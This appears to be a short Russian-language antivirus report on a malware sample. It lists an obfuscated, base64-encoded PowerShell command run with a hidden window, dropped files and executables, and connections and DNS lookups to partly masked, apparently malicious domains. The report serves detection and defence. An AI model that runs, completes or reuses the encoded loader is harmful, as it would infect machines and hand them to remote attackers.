Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAHIAZgBxAG0AeQB5AD0AKAAnAE4AcgAnACsAKAAnAGgAJwArACcAMgBjACcAKQArACcAOQBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAUgBQAFIAbw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1182066.cvr
- %HOMEPATH%\a4p3fzf\muh895s\qz0axz.exe
- %HOMEPATH%\a4p3fzf\muh895s\qz0axz.exe
- 'tv######lationofatlanta.com':443
- 'kr######ilindustries.com':443
- 'la##ebh.com':443
- 'tv######lationofatlanta.com':443
- 'kr######ilindustries.com':443
- DNS ASK te####otebook.com
- DNS ASK te###square.com
- DNS ASK te###null.com
- DNS ASK tv######lationofatlanta.com
- DNS ASK kr######ilindustries.com
- DNS ASK la##ebh.com
- DNS ASK sh###ocauca.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAHIAZgBxAG0AeQB5AD0AKAAnAE4AcgAnACsAKAAnAGgAJwArACcAMgBjACcAKQArACcAOQBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAUgBQAFIAbw...' (со скрытым окном)